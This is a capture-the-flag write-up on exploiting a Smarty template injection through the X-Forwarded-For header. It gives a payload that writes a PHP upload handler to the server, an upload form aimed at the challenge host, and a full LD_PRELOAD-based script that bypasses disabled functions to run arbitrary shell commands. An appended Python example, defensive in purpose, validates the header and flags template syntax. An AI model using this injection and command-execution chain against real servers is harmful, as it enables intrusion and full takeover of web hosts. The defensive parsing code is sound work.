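Based on the challenge hint, I guessed that this was a Smarty template injection vulnerability.
Tested as follows: X-Forwarded-For:{9*9}
Testing showed that system commands could not be executed, eval could not be executed, and file_get_contents could not reach the external network, so to upload a shell I wrote a PHP file that handles uploads: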
X-Forwarded-For:{file_put_contents('./up.php','<?php move_uploaded_file($_FILES["file"]["tmp_name"],$_POST[0]);')}
Then write an HTML form to upload files:
<form action="http://220.249.52.133:58479/up.php" enctype="multipart/form-data" method="post" name="uploadform"> <input type="file" name="file" value="Upload File"> <input type="text" name="0" value="1"> <input type="submit" name="submit" value="Upload"> </form>
Upload bypass_disablefunc.so.
Then upload the execution script as well:
<?php
echo "<p> <b>example</b>: http://site.com/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/var/www/bypass_disablefunc_x64.so </p>";
$cmd = $_GET["cmd"];
$out_path = $_GET["outpath"];
$evil_cmdline = $cmd . " > " . $out_path . " 2>&1";
echo "<p> <b>cmdline</b>: " . $evil_cmdline . "</p>";
putenv("EVIL_CMDLINE=" . $evil_cmdline);
$so_path = $_GET["sopath"];
putenv("LD_PRELOAD=" . $so_path);
mail("", "", "", "");
echo "<p> <b>output</b>: <br />" . nl2br(file_get_contents($out_path)) . "</p>";
unlink($out_path);
?>
Got the flag.
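A defensive counterpart to the injection point used above, as an added example that is not part of the original write-up: X-Forwarded-For should only ever carry IP addresses, so parse it strictly before the value reaches a template and flag anything else when reviewing logs. The function names and the sample header values are constructed for illustration, and the example assumes the application only needs a client IP from this header.

```python
import ipaddress
import re

# Characters used by Smarty delimiters and PHP expressions; none belong in an IP list.
TEMPLATE_HINT = re.compile(r"[{}$()`<>]")

def parse_xff(value):
    """Return the IP addresses in an X-Forwarded-For value, or None if any element is not an IP."""
    addrs = []
    for part in value.split(","):
        try:
            addrs.append(ipaddress.ip_address(part.strip()))
        except ValueError:
            return None  # reject the whole header, never pass a partial value on
    return addrs

def safe_client_ip(value):
    """Canonical string of the first address, or None; only this should reach a template."""
    addrs = parse_xff(value)
    return str(addrs[0]) if addrs else None

def classify(value):
    """Label a header value for log triage: ok, template-syntax or malformed."""
    if parse_xff(value) is not None:
        return "ok"
    return "template-syntax" if TEMPLATE_HINT.search(value) else "malformed"

# Constructed sample header values (not taken from a real log).
SAMPLE_HEADERS = [
    "203.0.113.7",
    "203.0.113.7, 10.0.0.2",
    "2001:db8::1",
    "{9*9}",               # the probe shown in the write-up
    "{$smarty.version}",
    "unknown",
]

def scan(headers):
    """Return (value, verdict) for every header value that is not a clean IP list."""
    results = [(h, classify(h)) for h in headers]
    return [(h, v) for h, v in results if v != "ok"]

if __name__ == "__main__":
    for header, verdict in scan(SAMPLE_HEADERS):
        print(f"{verdict:16} {header!r}")
```
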